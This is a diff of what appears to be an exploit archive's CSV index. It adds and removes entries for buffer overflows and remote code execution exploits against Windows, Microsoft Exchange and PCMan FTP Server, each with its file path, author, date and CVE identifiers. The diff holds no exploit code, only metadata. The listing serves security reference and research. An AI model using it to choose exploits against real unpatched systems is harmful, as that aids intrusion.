 51212,exploits/windows/local/51212.txt,"Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path",2023-04-03,"Milad karimi",local,windows,,2023-04-03,2023-04-03,0,,,,,,
 50867,exploits/windows/local/50867.txt,"Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path",2022-04-19,"Antonio Cuomo",local,windows,,2022-04-19,2022-04-19,0,,,,,,
@@ -45191,9 +45197,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,remote,windows,21,2015-08-31,2016-10-31,1,CVE-2013-4730;OSVDB-94624,,,http://www.exploit-db.com/screenshots/idlt38500/38013.png,http://www.exploit-db.comPCMan.7z,
 40713,exploits/windows/remote/40713.py,"PCMan FTP Server 2.0.7 - 'SITE CHMOD' Remote Buffer Overflow",2016-11-04,"Luis Noriega",remote,windows,,2016-11-04,2016-11-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-04-at-122818.png,http://www.exploit-db.comPCMan.7z,
 40680,exploits/windows/remote/40680.py,"PCMan FTP Server 2.0.7 - 'UMASK' Remote Buffer Overflow",2016-11-02,Eagleblack,remote,windows,,2016-11-02,2016-11-02,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-02-at-135629.png,http://www.exploit-db.comPCMan.7z,
+52326,exploits/windows/remote/52326.txt,"PCMan FTP Server 2.0.7 - Buffer Overflow",2025-06-15,"Fernando Mengali",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-4255,,,,,
 38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",remote,windows,21,2015-09-28,2015-09-28,0,CVE-2015-7601;OSVDB-128191,,,,http://www.exploit-db.comPCMan.7z,
 27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,remote,windows,21,2013-07-22,2013-07-22,1,OSVDB-94624;CVE-2013-4730,"Metasploit Framework (MSF)",,,http://www.exploit-db.comPCMan.7z,
-26471,exploits/windows/remote/26471.NA,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",remote,windows,21,2013-06-27,2025-06-13,0,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31254,exploits/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 31255,exploits/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",remote,windows,21,2014-01-29,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,,http://www.exploit-db.comPCMan.7z,
 27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,remote,windows,,2013-08-02,2016-10-31,1,OSVDB-94624;CVE-2013-4730,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-08-at-34942-pm.png,http://www.exploit-db.comPCMan.7z,
@@ -45908,6 +45914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows,,2008-12-18,,1,OSVDB-50884;CVE-2008-5862,,,,,
 51765,exploits/windows/remote/51765.txt,"WebCatalog 48.4 - Arbitrary Protocol Execution",2024-02-02,ItsSixtyN3in,remote,windows,,2024-02-02,2024-02-02,0,,,,,,
 16550,exploits/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker (Metasploit)",2010-09-24,Metasploit,remote,windows,,2010-09-24,2011-03-10,1,,"Metasploit Framework (MSF)",,,,
+52334,exploits/windows/remote/52334.NA,"WebDAV Windows 10 - Remote Code Execution (RCE)",2025-06-15,"Dev Bui Hieu",remote,windows,,2025-06-15,2025-06-15,0,,,,,,
 3913,exploits/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Remote Buffer Overflow",2007-05-12,vade79,remote,windows,8080,2007-05-11,2016-09-29,1,OSVDB-40741;CVE-2007-2668,,,,http://www.exploit-db.comwebdesproxy-win32.tgz,
 37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow",2015-06-01,metacom,remote,windows,,2015-06-01,2016-03-08,1,,,,,,
 45695,exploits/windows/remote/45695.rb,"WebExec - (Authenticated) User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,,2018-10-25,2019-03-17,1,CVE-2018-15442,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/2ab9a003d40e436e2f1099d0d164b76a0c2d4d33/modules/exploits/windows/smb/webexec.rb
@@ -45957,6 +45964,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41073,exploits/windows/remote/41073.py,"WinaXe Plus 8.7 - Remote Buffer Overflow",2017-01-16,"Peter Baris",remote,windows,,2017-01-16,2017-01-16,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-16-at-152056.png,http://www.exploit-db.comwinaxep.exe,
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
+52330,exploits/windows/remote/52330.py,"Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)",2025-06-15,"Mohammed Idrees Banyamer",remote,windows,,2025-06-15,2025-06-15,0,CVE-2025-33073,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
 52325,exploits/windows/remote/52325.py,"Windows File Explorer Windows 10 Pro x64 - TAR Extraction",2025-06-13,"Daniel Miranda",remote,windows,,2025-06-13,2025-06-13,0,CVE-2025-24071,,,,,
 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,